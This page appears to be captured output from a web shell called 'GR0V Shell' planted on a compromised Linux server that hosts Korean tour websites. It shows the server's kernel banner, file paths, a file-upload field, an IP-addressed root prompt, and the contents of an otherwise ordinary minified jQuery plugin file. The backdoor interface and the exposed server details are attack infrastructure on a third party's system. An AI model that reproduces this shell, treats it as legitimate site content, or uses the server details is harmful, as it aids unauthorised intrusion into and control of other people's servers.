? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/test/media/widgetkit/js/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/test/media/widgetkit/js/jquery.plugins.js

/*
 Copyright (c) 2010 Brandon Aaron (http://brandonaaron.net)
 Licensed under the MIT License (LICENSE.txt).

 Thanks to: http://adomas.org/javascript-mouse-wheel/ for some pointers.
 Thanks to: Mathias Bank(http://www.mathias-bank.de) for a scope bug fix.
 Thanks to: Seamus Leahy for adding deltaX and deltaY

 Version: 3.0.4

 Requires: 1.2.2+
*/
(function(g,e){var a={};e.$widgetkit={lazyloaders:{},load:function(b){a[b]||(a[b]=g.getScript(b));return a[b]},lazyload:function(a){a=a||document;g("[data-widgetkit]",a).each(function(){var a=g(this),b=a.data("widgetkit"),d=a.data("options")||{};!a.data("wk-loaded")&&$widgetkit.lazyloaders[b]&&($widgetkit.lazyloaders[b](a,d),a.data("wk-loaded",!0))})}};g(function(){$widgetkit.lazyload()});for(var b=document.createElement("div"),b=b.style,d=!1,c=["-webkit-","-moz-","-o-","-ms-","-khtml-"],f=["Webkit",
"Moz","O","ms","Khtml"],i="",h=0;h<f.length;h++)if(""===b[f[h]+"Transition"]){d=f[h]+"Transition";i=c[h];break}$widgetkit.prefix=i;$widgetkit.support={transition:d,css3d:d&&"WebKitCSSMatrix"in window&&"m11"in new WebKitCSSMatrix&&!navigator.userAgent.match(/Chrome/i),canvas:function(){var a=document.createElement("canvas");return!(!a.getContext||!a.getContext("2d"))}()};$widgetkit.css3=function(a){a=a||{};a.transition&&(a[i+"transition"]=a.transition);a.transform&&(a[i+"transform"]=a.transform);a["transform-origin"]&&
(a[i+"transform-origin"]=a["transform-origin"]);return a};b=null})(jQuery,window);(function(g){g.browser.msie&&9>parseInt(g.browser.version)&&(g(document).ready(function(){g("body").addClass("wk-ie wk-ie"+parseInt(g.browser.version))}),g.each("abbr article aside audio canvas details figcaption figure footer header hgroup mark meter nav output progress section summary time video".split(" "),function(){document.createElement(this)}))})(jQuery);
(function(g,e){e.$widgetkit.trans={__data:{},addDic:function(a){g.extend(this.__data,a)},add:function(a,b){this.__data[a]=b},get:function(a){if(!this.__data[a])return a;var b=1==arguments.length?[]:Array.prototype.slice.call(arguments,1);return this.printf(""+this.__data[a],b)},printf:function(a,b){if(!b)return a;var d="",c=a.split("%s");if(1==c.length)return a;for(var f=0;f<b.length;f++)c[f].lastIndexOf("%")==c[f].length-1&&f!=b.length-1&&(c[f]+="s"+c.splice(f+1,1)[0]),d+=c[f]+b[f];return d+c[c.length-
1]}}})(jQuery,window);
(function(g){g.easing.jswing=g.easing.swing;g.extend(g.easing,{def:"easeOutQuad",swing:function(e,a,b,d,c){return g.easing[g.easing.def](e,a,b,d,c)},easeInQuad:function(e,a,b,d,c){return d*(a/=c)*a+b},easeOutQuad:function(e,a,b,d,c){return-d*(a/=c)*(a-2)+b},easeInOutQuad:function(e,a,b,d,c){return 1>(a/=c/2)?d/2*a*a+b:-d/2*(--a*(a-2)-1)+b},easeInCubic:function(e,a,b,d,c){return d*(a/=c)*a*a+b},easeOutCubic:function(e,a,b,d,c){return d*((a=a/c-1)*a*a+1)+b},easeInOutCubic:function(e,a,b,d,c){return 1>
(a/=c/2)?d/2*a*a*a+b:d/2*((a-=2)*a*a+2)+b},easeInQuart:function(e,a,b,d,c){return d*(a/=c)*a*a*a+b},easeOutQuart:function(e,a,b,d,c){return-d*((a=a/c-1)*a*a*a-1)+b},easeInOutQuart:function(e,a,b,d,c){return 1>(a/=c/2)?d/2*a*a*a*a+b:-d/2*((a-=2)*a*a*a-2)+b},easeInQuint:function(e,a,b,d,c){return d*(a/=c)*a*a*a*a+b},easeOutQuint:function(e,a,b,d,c){return d*((a=a/c-1)*a*a*a*a+1)+b},easeInOutQuint:function(e,a,b,d,c){return 1>(a/=c/2)?d/2*a*a*a*a*a+b:d/2*((a-=2)*a*a*a*a+2)+b},easeInSine:function(e,a,
b,d,c){return-d*Math.cos(a/c*(Math.PI/2))+d+b},easeOutSine:function(e,a,b,d,c){return d*Math.sin(a/c*(Math.PI/2))+b},easeInOutSine:function(e,a,b,d,c){return-d/2*(Math.cos(Math.PI*a/c)-1)+b},easeInExpo:function(e,a,b,d,c){return 0==a?b:d*Math.pow(2,10*(a/c-1))+b},easeOutExpo:function(e,a,b,d,c){return a==c?b+d:d*(-Math.pow(2,-10*a/c)+1)+b},easeInOutExpo:function(e,a,b,d,c){return 0==a?b:a==c?b+d:1>(a/=c/2)?d/2*Math.pow(2,10*(a-1))+b:d/2*(-Math.pow(2,-10*--a)+2)+b},easeInCirc:function(e,a,b,d,c){return-d*
(Math.sqrt(1-(a/=c)*a)-1)+b},easeOutCirc:function(e,a,b,d,c){return d*Math.sqrt(1-(a=a/c-1)*a)+b},easeInOutCirc:function(e,a,b,d,c){return 1>(a/=c/2)?-d/2*(Math.sqrt(1-a*a)-1)+b:d/2*(Math.sqrt(1-(a-=2)*a)+1)+b},easeInElastic:function(e,a,b,d,c){var e=1.70158,f=0,g=d;if(0==a)return b;if(1==(a/=c))return b+d;f||(f=0.3*c);g<Math.abs(d)?(g=d,e=f/4):e=f/(2*Math.PI)*Math.asin(d/g);return-(g*Math.pow(2,10*(a-=1))*Math.sin((a*c-e)*2*Math.PI/f))+b},easeOutElastic:function(e,a,b,d,c){var e=1.70158,f=0,g=d;
if(0==a)return b;if(1==(a/=c))return b+d;f||(f=0.3*c);g<Math.abs(d)?(g=d,e=f/4):e=f/(2*Math.PI)*Math.asin(d/g);return g*Math.pow(2,-10*a)*Math.sin((a*c-e)*2*Math.PI/f)+d+b},easeInOutElastic:function(e,a,b,d,c){var e=1.70158,f=0,g=d;if(0==a)return b;if(2==(a/=c/2))return b+d;f||(f=c*0.3*1.5);g<Math.abs(d)?(g=d,e=f/4):e=f/(2*Math.PI)*Math.asin(d/g);return 1>a?-0.5*g*Math.pow(2,10*(a-=1))*Math.sin((a*c-e)*2*Math.PI/f)+b:0.5*g*Math.pow(2,-10*(a-=1))*Math.sin((a*c-e)*2*Math.PI/f)+d+b},easeInBack:function(e,
a,b,d,c,f){void 0==f&&(f=1.70158);return d*(a/=c)*a*((f+1)*a-f)+b},easeOutBack:function(e,a,b,d,c,f){void 0==f&&(f=1.70158);return d*((a=a/c-1)*a*((f+1)*a+f)+1)+b},easeInOutBack:function(e,a,b,d,c,f){void 0==f&&(f=1.70158);return 1>(a/=c/2)?d/2*a*a*(((f*=1.525)+1)*a-f)+b:d/2*((a-=2)*a*(((f*=1.525)+1)*a+f)+2)+b},easeInBounce:function(e,a,b,d,c){return d-g.easing.easeOutBounce(e,c-a,0,d,c)+b},easeOutBounce:function(e,a,b,d,c){return(a/=c)<1/2.75?d*7.5625*a*a+b:a<2/2.75?d*(7.5625*(a-=1.5/2.75)*a+0.75)+
b:a<2.5/2.75?d*(7.5625*(a-=2.25/2.75)*a+0.9375)+b:d*(7.5625*(a-=2.625/2.75)*a+0.984375)+b},easeInOutBounce:function(e,a,b,d,c){return a<c/2?0.5*g.easing.easeInBounce(e,2*a,0,d,c)+b:0.5*g.easing.easeOutBounce(e,2*a-c,0,d,c)+0.5*d+b}})})(jQuery);
(function(g){function e(a){var d=a||window.event,c=[].slice.call(arguments,1),f=0,e=0,h=0,a=g.event.fix(d);a.type="mousewheel";a.wheelDelta&&(f=a.wheelDelta/120);a.detail&&(f=-a.detail/3);h=f;void 0!==d.axis&&d.axis===d.HORIZONTAL_AXIS&&(h=0,e=-1*f);void 0!==d.wheelDeltaY&&(h=d.wheelDeltaY/120);void 0!==d.wheelDeltaX&&(e=-1*d.wheelDeltaX/120);c.unshift(a,f,e,h);return g.event.handle.apply(this,c)}var a=["DOMMouseScroll","mousewheel"];g.event.special.mousewheel={setup:function(){if(this.addEventListener)for(var b=
a.length;b;)this.addEventListener(a[--b],e,!1);else this.onmousewheel=e},teardown:function(){if(this.removeEventListener)for(var b=a.length;b;)this.removeEventListener(a[--b],e,!1);else this.onmousewheel=null}};g.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery);
(function(g){g.support.ajaxupload=function(){function e(){var a=new XMLHttpRequest;return!(!a||!("upload"in a&&"onprogress"in a.upload))}return function(){var a=document.createElement("INPUT");a.type="file";return"files"in a}()&&e()&&!!window.FormData}();g.support.ajaxupload&&g.event.props.push("dataTransfer");g.fn.uploadOnDrag=function(e){return!g.support.ajaxupload?this:this.each(function(){var a=g(this),b=g.extend({action:"",single:!1,method:"POST",params:{},loadstart:function(){},load:function(){},
loadend:function(){},progress:function(){},complete:function(){},allcomplete:function(){},readystatechange:function(){}},e);a.on("drop",function(a){function c(a,b){for(var d=new FormData,c=new XMLHttpRequest,f=0,e;e=a[f];f++)d.append("files[]",e);for(var h in b.params)d.append(h,b.params[h]);c.upload.addEventListener("progress",function(a){b.progress(100*(a.loaded/a.total),a)},!1);c.addEventListener("loadstart",function(a){b.loadstart(a)},!1);c.addEventListener("load",function(a){b.load(a)},!1);c.addEventListener("loadend",
function(a){b.loadend(a)},!1);c.addEventListener("error",function(a){b.error(a)},!1);c.addEventListener("abort",function(a){b.abort(a)},!1);c.open(b.method,b.action,!0);c.onreadystatechange=function(){b.readystatechange(c);if(4==c.readyState){var a=c.responseText;if("json"==b.type)try{a=g.parseJSON(a)}catch(d){a=!1}b.complete(a,c)}};c.send(d)}a.stopPropagation();a.preventDefault();var f=a.dataTransfer.files;if(b.single){var e=a.dataTransfer.files.length,h=0,j=b.complete;b.complete=function(a,d){h+=
1;j(a,d);h<e?c([f[h]],b):b.allcomplete()};c([f[0]],b)}else c(f,b)}).on("dragover",function(a){a.stopPropagation();a.preventDefault()})})};g.fn.ajaxform=function(e){return!g.support.ajaxupload?this:this.each(function(){var a=g(this),b=g.extend({action:a.attr("action"),method:a.attr("method"),loadstart:function(){},load:function(){},loadend:function(){},progress:function(){},complete:function(){},readystatechange:function(){}},e);a.on("submit",function(a){a.preventDefault();var a=new FormData(this),
c=new XMLHttpRequest;a.append("formdata","1");c.upload.addEventListener("progress",function(a){b.progress(100*(a.loaded/a.total),a)},!1);c.addEventListener("loadstart",function(a){b.loadstart(a)},!1);c.addEventListener("load",function(a){b.load(a)},!1);c.addEventListener("loadend",function(a){b.loadend(a)},!1);c.addEventListener("error",function(a){b.error(a)},!1);c.addEventListener("abort",function(a){b.abort(a)},!1);c.open(b.method,b.action,!0);c.onreadystatechange=function(){b.readystatechange(c);
if(4==c.readyState){var a=c.responseText;if("json"==b.type)try{a=g.parseJSON(a)}catch(d){a=!1}b.complete(a,c)}};c.send(a)})})}})(jQuery);

T1KUS90T
  root-grov@210.1.60.28:~$